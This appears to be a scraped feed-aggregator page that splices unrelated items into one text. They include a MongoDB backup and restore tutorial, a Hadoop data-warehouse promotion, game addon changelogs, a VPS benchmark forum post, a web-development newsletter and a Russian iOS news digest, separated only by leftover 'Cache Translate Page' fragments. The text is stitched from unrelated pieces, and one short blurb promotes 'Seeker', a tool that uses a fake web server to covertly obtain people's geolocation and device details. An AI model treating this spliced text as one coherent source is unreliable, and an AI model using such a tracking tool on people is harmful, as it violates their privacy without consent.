If you have a small database (<100GB) and you want to have full control of your backups, then Mongodump and Mongorestore are your best options. These are mongo shell commands which can be used to manually backup your database or collections. Mongodump dumps all the data in Binary JSON(BSON) format to the specified location. Mongorestore can use this BSON files to restore your database.

Backup a Whole Database $ sudo mongodump --db mydb --out /var/backups/mongo

Output:

2018-08-20T10:11:57.685-0500 writing mydb.users to /var/backups/mongo/mydb/users.bson 2018-08-20T10:11:57.907-0500 writing mydb.users metadata to /var/backups/mongo/mydb/users.metadata.json 2018-08-20T10:11:57.911-0500 done dumping mydb.users (25000 documents) 2018-08-20T10:11:57.911-0500 writing mydb.system.indexes to /var/backups/mongo/mydb/system.indexes.bson

In this command, the most important argument is --db. It specifies the name of the database that you want to backup. If you don’t specify this argument then the Mongodump command will backup all your databases which can be very intensive process.

Backup a Single Collection $ mongodump -d mydb -o /var/backups/mongo --collection users

This command will backup only users collection in mydb database. If you don’t give this option then, it will backup all the collection in the database by default.

Taking Regular Backups Using Mongodump/Mongorestore

As a standard practice, you should be making regular backups of your MongoDB database. Suppose you want to take a backup every day at 3:03 AM, then in a linux system you can do this by adding a cron entry in crontab.

$ sudo crontab -e

Add this line in crontab:

3 3 * * * mongodump --out /var/backups/mongo Restore a Whole Database

For restoring the database, we can use Mongorestore command with --db option. It will read the BSON files created by Mongodump and restore your database.

$ sudo mongorestore --db mydb /var/backups/mongo/mydb

Output

2018-07-20T12:44:30.876-0500 building a list of collections to restore from /var/backups/mongo/mydb/ dir 2018-07-20T12:44:30.908-0500 reading metadata file from /var/backups/mongo/mydb/users.metadata.json 2018-07-20T12:44:30.909-0500 restoring mydb.users from file /var/backups/mongo/mydb/users.bson 2018-07-20T12:45:01.591-0500 restoring indexes for collection mydb.users from metadata 2018-07-20T12:45:01.592-0500 finished restoring mydb.users (25000 documents) 2018-07-20T12:45:01.592-0500 done Restore a whole collection

To restore just a single collection from db, you can use the following command:

$ mongorestore -d mydb -c users mydb/users.bson

If your collection is backed up in JSON format instead of BSON then you can use the following command:

$ mongoimport --db mydb --collection users --file users.json --jsonArray Advantages Very simple to use You have full access to your backup You can put your backups at any location like NFS shares, AWS S3 etc. Disadvantages Every time it will take a full backup of the database, not just the difference. For large databases, it can take hours to backup and restore the database. It’s not point-in-time by default, which means that if your data changes while backing it up then your backup may result in inconsistency. You can use --oplog option to resolve this problem. It will take a snapshot of the database at the end of mongodump process. MongoDB Ops Manager

Ops Manager is a management application for MongoDB which runs in your data center. It continuously backs up your data and provides point-in-time restore processes for your database. Within this application, there is an agent which connects to your MongoDB instances. It will first perform an initial sync to backup the current state of the database. The agent will keep sending the compressed and encrypted oplog data to Ops Manager so that you can have a continuous backup. Using this data, Ops Manager will create database snapshots. It will create a snapshot of your database every 6 hours and oplog data will be stored for 24 hours. You can configure the snapshot schedule anytime using the Ops Manager.

Advantages It’s point-in-time by default Doesn’t impact the production performance except for initial sync Support for consistent snapshots of sharded clusters Flexibility to exclude non-critical collections Disadvantages Network latency increases with the snapshot size while restoring the database. MongoDB Cloud Manager

MongoDB Cloud Manager is cloud-based backup solution which provides point-in-time restore, continuous and online backup solution as a fully managed service. You can simply install the Cloud Manager agent to manage backup and restore of your database. It will store your backup data in MongoDB cloud.

Advantages Very simple to use. Good GUI. Continuous backup of queries and oplog. Disadvantages No control on backup data. It is stored in MongoDB cloud. Cost depends on the size of the data and the amount of oplog changes. Restore process is slow. Snapshot Database Files

This is the simplest solution to backup your database. You can copy all the underlying files (content of data/ directory) and place it to any secure location. Before copying all the files, you should stop all the ongoing write operations to a database to ensure the data consistency. You can use db.fsyncLock() command to stop all the write operations.

There are two types of snapshots: one is cloud level snapshots and another is OS level snapshots.

If you are storing database data with a cloud service provider like AWS then you have to take AWS EBS snapshots for backup. In contrast, if you are storing DB files in native OS like Linux then you have to take LVM snapshots. LVM snapshots are not portable to other machines. So cloud bases snapshots are better than OS based snapshots.

Advantages Easy to use. Full control over snapshots. You can move it to any data center. These snapshots are diff snapshots which store only the differences from previous snapshots. No need to download the snapshots for restoring your database. You can just create a new volume from your snapshot. Disadvantages Using this method, you can only restore your database at breakup points. Maintenance becomes very complex sometimes. To coordinate backups across all the replica sets (in sharded system), you need a special devops team.

ClusterControl

Single Console for Your Entire Database Infrastructure

Find out what else is new in ClusterControl

Install ClusterControl for FREE

MongoDB Consistent Backup tool

MongoDB consistent backup is a tool for performing consistent backups of MongoDB clusters. It can backup a cluster with one or many shards to a single point of the database. It uses Mongodump as a default backup method. Run the following command to take backup using this tool.

$ mongodb-consistent-backup -H localhost -P 27017 -u USERNAME -p PASSWORD -l /var/backups/mongo

All the backups generated by this commands are MongoRestore compatible. You can user mongorestore command with --oplogReplay option to ensure consistency.

$ mongorestore --host localhost --port 27017 -u USERNAME -p PASSWORD --oplogReplay --dir /var/backups/mongo/mydb/dump Advantages Fully open source Works with sharded cluster Provides an option for remote backup such as Amazon S3 Auto-scaling available Very easy to install and run Disadvantage Not fully mature product Very few remote upload options Doesn’t support data encryption before saving to disk Official code repository lacks proper testing ClusterControl Backup

ClusterControl is an all in one automated database management system. It lets you monitor, deploy, manage & scale your database clusters with ease. It supports mysql, MongoDB, PostgreSQL, Percona XtraDB and Galera Cluster. This software automates almost all the database operations like deploying a cluster, adding or removing a node from any cluster, continuous backups, scaling the cluster etc. All these things, you can do from one single GUI provided by the ClusterControl system.

ClusterControl provides a very nice GUI for MongoDB backup management with support for scheduling and creative reports. It gives you two options for backup methods.

Mongodump Mongodb consistent backup

So users can choose any option according to their needs. This tool assigns a unique ID to all the backups and stores it under this path: ClusterControl > Settings > Backup > BackupID. If the specified node is not live while taking the backup then the tool will automatically find the live node from the cluster and carry on the backup process on that node. This tool also provides an option for scheduling the backups using any of the above backup methods. You can enable/disable any scheduling job by just toggling a button. ClusterControl runs the backup process in background so it won’t affect the other jobs in the queue.

Advantages Easy installation and very simple to use Multiple options for backup methods Backup scheduling is very easy using a simple GUI form Automated backup verification Backup reports with status Disadvantage Both backup methods internally use mongodump, which has some issues with handling very large databases. Conclusion

A good backup strategy is a critical part of any database management system. MongoDB offers many options for backups and recovery/restore. Along with a good backup method, it is very important to have multiple replicas of the database. This helps to restore the database without having the downtime of even one second. Sometimes for larger databases, the backup process can be very resource intensive. So your server should be equipped with good CPU, RAM, and more disk space to handle this kind of load. The backup process can increase the load on the server because of these reasons so you should run the backup process during the nights or non-peak hours.


          Fast Track to Optimize Your Enterprise Data Warehouse      Cache   Translate Page   Web Page Cache   

Enterprise Data Warehouse (EDW) is traditionally used for generating reports and answering pre-defined queries, where workloads and requirements for service level are static. The drawback is that the platforms impose rigidity, because the schemas must be modeled in advance for queries that are anticipated. Constrained by this limitation, users cannot freely explore and ask questions from their data to enable timely responses and insights that drive the speed of business required to stay competitive today.

“Warehouse by the Lake” Complementary Approach

With the supplement of Apache Hadoop, it not only contains the growing costs of running enterprise data warehouses, but also gives users the flexibility and reusability over the consumption of data with the introduction of schema-on-read. When Hadoop is used to optimize EDW, organizations can get the best of both worlds with the use of the EDW for standard operational queries, and Hadoop for exploratory analytics and workload shift.

Hadoop provides a versatile and extensible analytic platform that uses commodity hardware and open source innovation to deliver economies of scale. Enterprise Data Warehouse (EDW) optimization , where data- and compute-intensive processes are offloaded from the EDW to Hadoop, has proven to be one of the most popular use cases for the open source platform. EDW optimization is often one of the first use cases for Hadoop because it can readily deliver tangible results, thanks to:

Cost savings delivered by commodity infrastructure and open source software. Proven capability to perform at scale. Innovations that have brought interactive BI to Hadoop. Productivity gains attributable to more efficient data enrichment and correlation.

However, the flip side is that making the proper configurations can be time-consuming because of the lack of expertise in integrating Hadoop into existing environments.

Introducing a Prescriptive Solution

The Hortonworks solution for EDW optimization addresses the need for an ideal configuration while capitalizing on Hadoop’s versatility. The solution enables customers unfamiliar with Hadoop to gain immediate proof of value with EDW optimization through a guided, fixed term, fixed-scope engagement, for the delivery of a full Hadoop platform that will grow with customer needs.

Beyond that, the one-month jumpstart engagement, which bundles services, software, and integrations, offers a prescriptive best-of-breed solution that includes:

Hortonworks Data Platform (HDP) as the open source Apache Hadoop distribution, Syncsort DMX-h for data integration, Jethro Data as the high-performance analytic engine, and Hortonworks Professional Services as the center of excellence ensuring the implementation is on-time and on-target.

The solution guides customers through a “recipe” that generates production-ready online analytical processing (OLAP) cubes to which they can connect their designated BI tools. This encompasses rehosting data and ETL processes from the data warehousing environment onto the Hortonworks Data Platform (HDP), helping customers configure Hadoop and installing partner tooling for data integration and OLAP.

To learn more about the Hortonworks solution that can help you right-size your EDW in a time-efficient manner for accelerated time-to-value, please read the white paper below:

Using Hadoop to Optimize the Enterprise Data Warehouse


          The Indian Express Script | Firstpost Script      Cache   Translate Page   Web Page Cache   
Our India times clone is mainly developed for the people to take up their news-portal business through on-line to provide a brand new professional news-portal script with advanced features and functionality to enhance the business to make latest and trends easier access to the users and this script will also help the new entrepreneur who likes to do on-line business and to provide the latest trending trusted news service with reliable and robust script, this India times script makes much easier for the users to access the site without any technical knowledge because our script is made as user-friendly. The Indian Express Script is designed with Open Source PHP platform to make the script as much as efficient to the user, this script can be customized to the users as globalised or local to make their reach to the worldwide and here the new user can simply register their account with their valid mail id and password to make authentication account
          SexyMap (v8.0.5)      Cache   Translate Page   Web Page Cache   
Change Log:
--------------------
SexyMap
v8.0.5 (2018-08-10)
Full Changelog Previous releases

Buttons: Correctly parent the zone text.
Buttons: Fix not being able to hide the dungeon status indicators.
ZoneText: Fix zone text not hiding.
Coordinates: Make sure the text doesn't expand beyond the border.
Buttons: Tweak the button fading code.
Use LibDBIcon as a feed for new addon buttons. This completely drops support for custom made addon buttons. SexyMap will no longer maintain an arbitrary list of these. Ask authors to use LibDBIcon to build their minimap icons.


Description:
--------------------
https://cdn-wow.mmoui.com/preview/pvw68420.png Please support my work on Patreon!

SexyMap is open source and development is done on GitHub. You can contribute code, localization, and report issues there: https://github.com/funkydude/SexyMap

Make your minimap ubersexah! SexyMap is a minimap awesomification mod, supporting:

Minimap moving, and movement of things like the quest tracker and durability frame.
Customization of zone text & clock
Hiding of all buttons attached to the minimap (can be set to be always hidden, or to show on minimap hover)
Sexy minimap border options, extremely configurable, with several slammin' presets.
Ping notification
Mousewheel minimap zoom, and auto zoom-out.
A HUD overlay for resource gathering, target tracking, and more.
          Capping (v8.0.11)      Cache   Translate Page   Web Page Cache   
Change Log:
--------------------
Capping
v8.0.11 (2018-08-10)
Full Changelog Previous releases

Another attempt to fix the issue where the queue ready timer would persist after zoning into the bg.
More score predictor improvements.
Change bar icon for score bar.


Description:
--------------------
https://cdn-wow.mmoui.com/preview/pvw68420.png Please support my work on Patreon!

Battleground timers and other PvP features.

Configure by right-clicking the anchor or by typing /capping

Features

All battlegrounds/arenas have queue timers
Arenas - Shadow Sight timer, arena time remaining
Alterac Valley - Node timers, auto quest turnins
Arathi Basin - Node timers and final score estimation
Eye of the Storm - Flag respawn timer, final score estimation
Isle of Conquest - Node timers and siege engine timer
Warsong Gulch - Flag respawn timer
Wintergrasp - Wall attack alerts
Battle for Gilneas - Node timers and final score estimation
Deepwind Gorge - Node timers and final score estimation


Capping is open source and development is done on GitHub. You can contribute code, localization, and report issues there: https://github.com/BigWigsMods/Capping
          New VPS specific benchmark [Update: Download avail.]      Cache   Translate Page   Web Page Cache   

Hello all

I have had enough from what I felt to be a quite unsatisfactory situation wrt. benchmarks. One of my major worries that seemed to not be addressed by any widely available server benchmark is the fact that VPSs are somewhat special and "sensitive animals" because there are other users on a node and because providers and neighbours are (understandably) easily angered by a VPS all but blocking a node during benchmarking.

vpsbench changes that. Using a microsecond based timer it can afford to and does break up the benchmark tests into many small slices with small pauses in between so that a node is never blocked by it.

Another gripe I had was that connectivity benchmarks virtually always include host resolution and server setup on the other side. As that can be quite a large amount of time the results are in between cooked and questionable. vpsbench doesn't do that but starts measuring only once the session is set up and data are beginning to flow so it shows the real throughput.

Probably only rarely useful it also shows the "build up" which can be helpful both to get an impression of congestion and especially in saving bandwidth. I have done a lot of testing and found out that virtually all connections are within 1% or 2% of their top speed after 32 - 64 MB. vpsbench has a default of 64 MB but allows any size between about 10 MB and about 2 GB, depending on the target file size of course. This feature also allows to test against a 1GB file but using only 64 MB or whatever one chose.

Oh and you can have different "target sets", say, a mainly Europe one, a west coast one, a small and fast one, etc. Moreover you can run all the tests (in a very simple way, see below) or you can chose which ones to run.

Another point I often missed was useful and relevant info on a VPS. Things like how many cores, how much real memory, model and family of the CPU, flags (useful to identify "hidden" vCores), etc. Well, vpsbench provides all that.

Regarding disks vpsbench does the usual sequential read/write and the somewhat less common random read/write and I do mean "random" (evil grin). If vpsbench shows good random read/write result you can bet that your database will fly.

My final issue was that I'm not interested in integer or floating point performance but in areas that are important for a server which is moving lots of data around, string operations and increasingly crypto. So that's what vpsbench does plus it looks at single core and at multi core performance.

I'm willing to open source vpsbench and I also have binaries (+- 1MB size) made for and tested with linux and FreeBSD both i386 and x64. Right now I'm planning on putting vpsbench binaries on some server for download but if there is significant interest I'll happily provide sources too.

Here is an example output from a real benchmark done on a 2 vCore 512MB VPS in Bucarest (the command was "vpsb ntargets" with ntargets being a file with servers to test for connectivity).

Let me know what you think and if you are interested.

Machine: amd64, Arch.: amd64, Model: Intel(R) Xeon(R) CPU     L5630  @ 2.13GHz
OS, version: linux 4.10.5, Mem.: 479 MB
CPU - Cores: 2, Family/Model/Stepping: 6/44/2
Cache: 32K/32K L1d/L1i, 256K L2, 12M L3
Std. Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat
          pse36 cflsh mmx fxsr sse sse2 ss htt pbe sse3 pclmulqdq dtes64 ds_cpl
          ssse3 cx16 xtpr pcid dca sse4_1 sse4_2 popcnt aes hypervisor
Ext. Flags: syscall nx pdpe1gb lm lahf_lm

--- proc/mem/performance test single core ---
64 rounds~ 1.00 GB ->  116.98 MB/s
--- proc/mem/performance test multi-core ---
4 times 64 rounds ~ 4.00 GB ->  312.24 MB/s
--- disk test ---
Sequential writing 216.60 MB/s
Random writing     37.11 MB/s
Sequential reading 904.19 MB/s
Random reading     711.21 MB/s
--- network test - target   100KB  1MB  10MB   -> 64 MB ---
http://speedtest.lon02.softlayer.com/downloads/test100.zip  OK,LON:
    6.0 Mb/s   14.2 Mb/s   43.9 Mb/s    -> 111.9 Mb/s
http://speedtest.mel01.softlayer.com/downloads/test100.zip  AU,MEL:
    747.0 Kb/s   1.7 Mb/s   5.3 Mb/s    -> 13.6 Mb/s
http://speedtest.che01.softlayer.com/downloads/test100.zip  IN,CHN:
    1.6 Mb/s   3.7 Mb/s   10.9 Mb/s    -> 28.5 Mb/s
http://speedtest.fra02.softlayer.com/downloads/test100.zip  DE,FRA:
    11.1 Mb/s   26.1 Mb/s   78.9 Mb/s    -> 189.7 Mb/s
http://speedtest.mil01.softlayer.com/downloads/test100.zip  IT,MIL:
    5.9 Mb/s   13.9 Mb/s   40.2 Mb/s    -> 106.1 Mb/s
http://speedtest.par01.softlayer.com/downloads/test100.zip  FR,PAR:
    7.0 Mb/s   16.5 Mb/s   47.7 Mb/s    -> 124.5 Mb/s
http://93.95.100.190/test100mb.bin  RUS,MOS:
    2.3 Mb/s   5.5 Mb/s   7.7 Mb/s    -> 6.0 Mb/s
http://speedtest.sao01.softlayer.com/downloads/test100.zip  BR,SAO:
    1.2 Mb/s   2.7 Mb/s   8.4 Mb/s    -> 22.0 Mb/s
http://speedtest.dal05.softlayer.com/downloads/test100.zip  US,DAL:
    1.8 Mb/s   4.4 Mb/s   13.5 Mb/s    -> 34.5 Mb/s
http://speedtest.sjc01.softlayer.com/downloads/test100.zip  US,SJC:
    1.5 Mb/s   3.4 Mb/s   11.0 Mb/s    -> 28.8 Mb/s
http://speedtest.wdc01.softlayer.com/downloads/test100.zip  US,WDC:
    2.3 Mb/s   5.2 Mb/s   16.8 Mb/s    -> 42.4 Mb/s
http://speedtest.tokyo.linode.com/100MB-tokyo.bin   JP,TOK:
    1.0 Mb/s   2.4 Mb/s   7.7 Mb/s    -> 18.8 Mb/s
http://lg-ro.vps2day.com/100MB.test RO,BUK:
    22.5 Mb/s   49.7 Mb/s   130.8 Mb/s    -> 273.6 Mb/s
http://speedtest.ftp.otenet.gr/files/test100Mb.db   GR,UNK:
    2.0 Mb/s   6.7 Mb/s   21.5 Mb/s    -> 61.3 Mb/s
http://speedtest.osl01.softlayer.com/downloads/test100.zip  NO,OSL:
    4.3 Mb/s   9.4 Mb/s   29.0 Mb/s    -> 75.9 Mb/s

          Amazon Releases Alexa SDK For Cars      Cache   Translate Page   Web Page Cache   
Amazon has launched an open source release of the Alexa Automotive Core (AAC) SDK, or Auto SDK, enabling automakers to integrate Alexa voice control into a car’s infotainment system. According to VentureBeat, the software development kit is free for download on GitHub, bringing Alexa to in-car dashboards for many common hands-free, voice-control tasks — such as playing […]
          Find Geolocation with Seeker with High Accuracy – Kali Linux 2018      Cache   Translate Page   Web Page Cache   

With the help of Seeker which is an open source python script, you can easily find the geolocation of any device with high accuracy along with device information like Resolution, OS Name, Browser, Public IP, Platform etc. Seeker uses Ngrok (for tunnelling) and creates a fake apache web server (on SSL) which asks for location […]

The post Find Geolocation with Seeker with High Accuracy – Kali Linux 2018 appeared first on Yeah Hub.


          Using GopherJS with gRPC-Web      Cache   Translate Page   Web Page Cache   
Introduction This article will talk about how to connect a GopherJS frontend to a Go backend. If you haven’t heard about GopherJS before, it’s an open source Go-to-JavaScript transpiler, allowing us to write Go code and run it in the browser. I recommend taking a look at the official GitHub repo and Dmitri Shuralyov’s DotGo presentation Go in the browser for a deeper introduction. Writing GopherJS apps is great fun and lets us avoid writing JavaScript and all the problems associated with it.
          Promoting the Quality and Collaboration of Your Open Source Project      Cache   Translate Page   Web Page Cache   
So your open source project is on GitHub. It has tests, an awesome logo, probably a few stars, and maybe even a few other contributors. To spread awareness, it might be shared on the relevant subreddit, Twitter, Hacker News, etc. While exposure is one of the most effective ways to promote a project, there are various steps that can be taken to ensure that its growth is positive and that the community it revolves around thrives.
          Data Pipelines and Versioning with the Pachyderm Go Client      Cache   Translate Page   Web Page Cache   
I know about Gophers, but what is a Pachyderm? Pachyderm is an open source framework, written in Go, for reproducible data processing. With Pachyderm, you can create language agnostic data pipelines where the data input and output of each stage of your pipeline are versioned controlled in Pachyderm’s File System (PFS). Think “git for data.” You can view diffs of your data and collaborate with teammates using Pachyderm commits and branches.
          Geographical data manipulation using go      Cache   Translate Page   Web Page Cache   
GIS open source world is dominated by C/C++, Java and Python code. Libraries like PROJ4, JTS, GEOS or GDAL are at the core of most of the open source geospatial projects. Through this article we will have a look at the ecosystem of geospatial related packages. We will create a GIF generator of an animated earth. In case you want to know more about the image generation package, I recommend reading two articles on the Go blog: The Go image package and the Thanksgiving 2011 doodle.
          Hydra: Run your own Identity and Access Management service in <5 Minutes      Cache   Translate Page   Web Page Cache   
This article introduces Hydra, the open source micro service alternative to proprietary authorization solutions. It will take you less than five minutes to start up a OAuth2 provider and gain access to a rich features set, including access control and identity management. Hydra was primarily written in response to our team’s need for a scalable 12factor OAuth2 consumer / provider with enterprise grade authorization and interoperability without a ton of dependencies or crazy features.
          Integrating Go in a Yocto-based project      Cache   Translate Page   Web Page Cache   
From its website, Yocto, part of the Linux Foundation Collaborative Projects, is an open source collaboration project that provides templates, tools and methods to help you create custom Linux-based systems for embedded products regardless of the hardware architecture. Given Go’s wonderful support for cross compilation, the two are like a match made in heaven. While not a requirement, Yocto-based projects have a strong preference for building everything from source, including the toolchain.
          Introducing Congo      Cache   Translate Page   Web Page Cache   
Congo - an upcoming Conference Management Tool While we absolutely love running GopherCon, one thing jumps out as the most troublesome aspect of managing a large conference: managing the data. There are nice commercial solutions, but they charge pretty high fees. There are some open source solutions, but they’re generally older and abandoned. There are some hybrid solutions that are free for smaller conferences and expensive for larger ones.
          Patchwork Toolkit - Lightweight Platform for the Network of Things      Cache   Translate Page   Web Page Cache   
Patchwork is a toolkit for connecting various devices into a network of things or, in a more broad case - Internet of Things (IoT). A tl;dr picture describing the idea behind it is shown below. Considering you as a hacker/hobbyist, the Patchwork toolkit can be expressed as follows: you take your favourite electronics (bunch of sensors, LED strip, robot-toys, etc), connect them to a pocket-size Linux box, install Patchwork, and after some quick configuration you get RESTful APIs, MQTT data streams, directory of your devices and services, their discovery on the LAN with DNS-SD/Bonjour, and a damn-sexy, open source real-time dashboard based on Freeboard.
          Why InfluxDB is written in Go      Cache   Translate Page   Web Page Cache   
InfluxDB is an open source time series database written in Go. One of the important distinctions between Influx and some other time series solutions is that it doesn’t require any other software to install and run. This is one of the many wins that Influx gets from choosing Go as its implementation language. While the first commit to InfluxDB was just over a year ago, our decision to use Go can be traced back to November 2012.
          Writing a Distributed Systems Library in Go      Cache   Translate Page   Web Page Cache   
Writing a Distributed Systems Library in Go Introduction In early 2013, I needed to add distributed processing and storage to my open source behavioral analytics database. To my surprise, there were almost no libraries for distributing data. Tools like doozerd were great for building systems on top of but I didn’t want my database to depend on a third party server. As I began to read distributed systems research papers I began to understand why there were not many libraries available.
          Continuous Integration and Delivery with Ansible      Cache   Translate Page   Web Page Cache   
If your team is struggling to enable continuous integration and continuous deployment (CI/CD), it may be time to consider implementing an IT automation engine. Read on here to learn about an open source automation engine that could help you enable CI/CD with zero downtime. Published by: Red Hat
          SkyDNS (Or The Long Road to Skynet)      Cache   Translate Page   Web Page Cache   
SkyDNS and Skynet This article is in two sections. The first is the announcement of SkyDNS, a new tool to help manage service discovery and announcement. The second part of the article is a bit of a back story about why we needed this tool and how we got here. If you’re the impatient type, you can read the annoucement and description of SkyDNS and skip the rest. SkyDNS Today we’re releasing SkyDNS as an open source project on github.
          Software Developer - Varian Medical Systems - Winnipeg, MB      Cache   Translate Page   Web Page Cache   
Java, JavaScript/TypeScript, Angular, Python. Specialization in Java or other open source Web Application stack....
From Varian Medical Systems - Fri, 03 Aug 2018 06:07:59 GMT - View all Winnipeg, MB jobs
          UX Developer Lead, Themes - Shopify - Montréal, QC      Cache   Translate Page   Web Page Cache   
We champion Slate, an open source development tool, and work with our colleagues across the Online store channel to shape the development of new platform...
From Shopify - Tue, 10 Jul 2018 20:00:27 GMT - View all Montréal, QC jobs
          WDRL — Edition 238: Chrome 67 Client Hints, Safari ITP Debugger, the Cost of JavaScript in 2018, and the not so nice impact of Open Source Projects.      Cache   Translate Page   Web Page Cache   

Hey,

welcome to another edition of my newsletter. Please note that for the next two weeks I’ll be on vacation and not writing a list but before that, I found quite a couple of very good articles and resources worth reading this week.

Eric Meyer has published an article this week, elaborating the problems of the effort to make the web HTTPS only — where he reveals that developing countries suffer a lot from this development as they often have bad internet connections and due to the encryption, they now experience more website errors than previously. Ben Werdmüller jumped in and published his article “Stop building for San Francisco” in which he points out one of the biggest problems we have as developers: We use priviledged hardware and infrastructure. We build experiences using the latest iPhones, Macbooks with Gigabit or fast 4G connections but never consider that most people we’re building for use far less equipped devices and infrastructures. And while it’s a great idea to make the web more secure, we should always keep in mind who this might impact, who will not be able to access your site anymore.

News

Generic

  • If you have an Open Source project or are building a new one, you have to decide which license it should use. Now there’s a new option, the Just World License. It’s for developers that agree in general with the principles of open source software, but are uncomfortable with their software being used as part of efforts to destroy lives, our environment and our future.
  • Eric Meyer has published an article this week, elaborating the problems of the effort to make the web HTTPS only — where he reveals that developing countries suffer a lot from this development as they often have bad internet connections and due to the encryption, they now experience more website errors than previously. Ben Werdmüller jumped in and published his article “Stop building for San Francisco” in which he points out one of the biggest problems we have as developers: We use priviledged hardware and infrastructure. We build experiences using the latest iPhones, Macbooks with Gigabit or fast 4G connections but never consider that most people we’re building for use far less equipped devices and infrastructures. And while it’s a great idea to make the web more secure, we should always keep in mind who this might impact, who will not be able to access your site anymore.

Tooling

  • Prashant Palikhe wrote a long story about the art of debugging with Chrome’s Developer Tools, which I can highly recommend as it’s a very complete reference to getting to know the developer tools of a browser. If you use another browser, that’s not a big problem as most tools are quite similar.

Security

  • And another new Observer is around now: The ReportingObserver API lets you know when your site uses a deprecated API or runs into a browser intervention and is available in Chrome 69 so far. You could easily use this to send such errors that previously were only available in the Console to your backend or error handling service.

Accessibility

JavaScript

  • Addy Osmani researched the cost of JavaScript in 2018 and wrote a summary article, sharing evidence that every byte of JavaScript is still the most expensive resource we can send to mobile phones because it can delay interactivity in large ways. This is increasingly becoming a problem with not so capable phones that are widely used outside the tech industry.

CSS

Work & Life

  • Paris Marx on why lifestyle entrepreneurs ignore communities at home and abroad and digital nomads are not the future, according to him. He shares why location independence is only possible because of communication infrastructures built with public funds and why it’s not fair to abuse it.

Go beyond…

  • Jeremy Nagel lets us all think about the impact we do when we publish open source code: As developers we tend to think that this is an amazing move but then we make our source code available to bad players in the world as well — to coal miners, to pollution-contributing companies, to those who use humans to get rich while mistreating them, to those who rip you off indirectly, to people who make money and don’t give you anything back by using your free, open source code. It’s not that you can’t do anything about it but to do so, you have to be aware of these issues and apply a better license or add a dedicated statement to your code. Want an example? Philip Morris International’s website uses jQuery and Bootstrap, a company that contributes to people getting cancer. Do you want to be attributed this way with your software?

—Anselm


          What’s new in Julia: Version 1.0 is here      Cache   Translate Page   Web Page Cache   
After nearly a decade in development, Julia, an open source, dynamic language geared to numerical computing, reached its Version 1.0 production release status on August 8, 2018. The previous version was the 0.6 beta.Julia, which vies with Python for sc...
          iOS дайджест #27: React Native — ну сколько можно, 10 лет AppStore, новинки Swift 4.2      Cache   Translate Page   Web Page Cache   

В выпуске: анализ CI сервисов, немного реверс инжинирим, упрощаем себе жизнь с помощью различных инструментов, любуемся Apple design award.

News

Swift Evolution
Судя по обновленному readme, Swift 5 стоит ждать уже в начале следующего года.

CarPlay iOS 12.0 Beta 1 to Beta 2 API Differences
В iOS 12 Beta 2 добавили много новых методов для CarPlay.

The App Store turns 10
App Store исполнилось 10 лет. Эти 10 лет многое изменили в плане бизнеса и потребления контента на мобильных устройствах.

10 years of the App Store: The design evolution of the earliest apps
И еще одна статья про десятилетние: как менялись приложения за эти 10 лет.

Apple Design Awards 2018
Победители Apple Design Awards 2018. Интересно наблюдать, как из года в год меняются тенденции дизайна.

За 4 года в репозитории Swift уже 18000 Pull Requests.

initial checkin, nothing much to see here.
Хоть Swift объявили 4 года назад, ему уже исполнилось 8 лет на самом деле.

Articles

Swift for Android: Our Experience and Tools
React Native не нужен, или как Readdle решили сделать андроид приложение на Swift. Судя по примеру приложения, не очень похоже на чистый Swift. Стоит ли оно того? Думаю, узнаем из новых статей от ребят.

Benchmark of Swift extensions vs methods: Swift 4.1
О боже, о боже, наличие множества экстеншенов замедляет скорость компиляции. Но только эта разница становится значимой, если у вас тысячи методов.

Интересная статистика — чему больше всего уделяют внимания на WWDC. Радует, что в этом году уделили больше времени macOS.

Enabling newly added opt-in features in Xcode 10
Если вы уже пользуетесь Xcode 10, то имеет смысл включить новые фичи.

Custom Intents with SiriKit on iOS 12
Уже подоспели первые туториал по SiriKit. Не забываем, что много из этого доступно в видео с WWDC.

Быстрые команды Siri
А если хотите на русском, то вот (не перевод).

Any[Object]
Тип AnyObject в Swift не такой простой как кажется. В конце статьи есть ряд правил, которые помогут предотвратить неочевидные баги.

The iOS Testing Manifesto
Это уже становится традицией — подробный гайд про тестирование.

Painless Core Data in Swift
Еще немного советов по работе с Core Data.

Continuous Integration Services for iPhone Apps in 2018
Обзор CI сервисов. В конце есть Editor’s Choice.

AvitoTech team playbook
Avito делятся, как у них устроена команда, процессы, а также рассказывают про историю, ценность компании.

iOS Developer Skills Matrix
Матрица Junior-Middle-Senior. Все, конечно, условно и зависит от компании, но все равно забавно посмотреть.

State of React Native 2018

Или все-таки нужен React Native? Facebook работает над новой версией RN, в которой будет легче работать с нативными элементами. При этом старые приложения будет легко адаптировать. Ждем новостей ближе к концу года.

React Native at Airbnb
Цикл статей из 5 статей от Airbnb, где они рассказывают о своем двухлетнем опыте использования React Native. Если коротко, то поигрались и хватит. Но опыт интересный в любом случае.

The Case for React Native
А Эш рассказывает, как ему нравится RN. Решать вам, использовать или нет.

Airbnb and React Native Expectations
А потом решил прокомментировать статьи от Airbnb. Тоже интересное мнение.

React Native: A retrospective from the mobile-engineering team at Udacity
И еще одна компания попробовал RN и отказалась. Статья странноватая, но все же.

What we learned about CI/CD analysing 75k builds
Интересная статистика по поводу использования CI в мобильных проектах.

The Story Behind Susan Kare’s Iconic Design Work for Apple
История создания иконок для первых макинтошей.

iPad Navigation Bar and Toolbar Height Changes in iOS 12
Просто взяли, поменяли высоты навигейшен бара или таббара и никому не сказали. Молодцы Apple.

How to Use Slack and Not Go Crazy
Несколько советов, как работать со Slack, чтобы жизнь была немного проще.

A Year of Monument Valley 2
Monument Valley подвели итоги года. Там же доступны итоги прошлых лет. Интересно наблюдать, как вырос китайский рынок.

Reverse Engineering Instruments’ File Format
Почему бы не пореверс-инженерить формат файла инструментов в Xcode?

Code

What’s new in Swift 4.2
Xcode 10 c поддержкой Swift 4.2 выйдет осенью, а пока можно потыкать бету и посмотреть, какие фичи нас ждут.

Swift’s new calling convention
Новый calling conventions в Swift 4.2 должен улучшить производительность за счет сокращения вызовов retain, release. Ждем бенчмарки.

Icon for File with UIKit
Получаем картинки для разных типов файлов. В общем-то, это достаточно популярный подход в macOS, в CleanMyMac мы его тоже часто используем.

Writing self-documenting Swift code
Я всегда за то, чтобы использовать переменные или функции вместо комментариев, которые устаревают, теряются или еще что-то. На эту тему есть еще хорошая шутка. Джон рассказывает еще про несколько подходов, как сделать код самодокументируемым.

Making Swift tests easier to debug
Ни один дайджест не обходится без статей от Джона. Читаемость тестов не менее важна, чем читаемость самого кода, так как это пример того, как использовать код и они зачастую полезнее любой документации.

Swift Diagnostics: #warning and #error
Возможно, вы уже видели, что в Swift 4.2 добавили #warning и #error. Но как это реализовано под капотом?

Enumerating enum cases in Swift
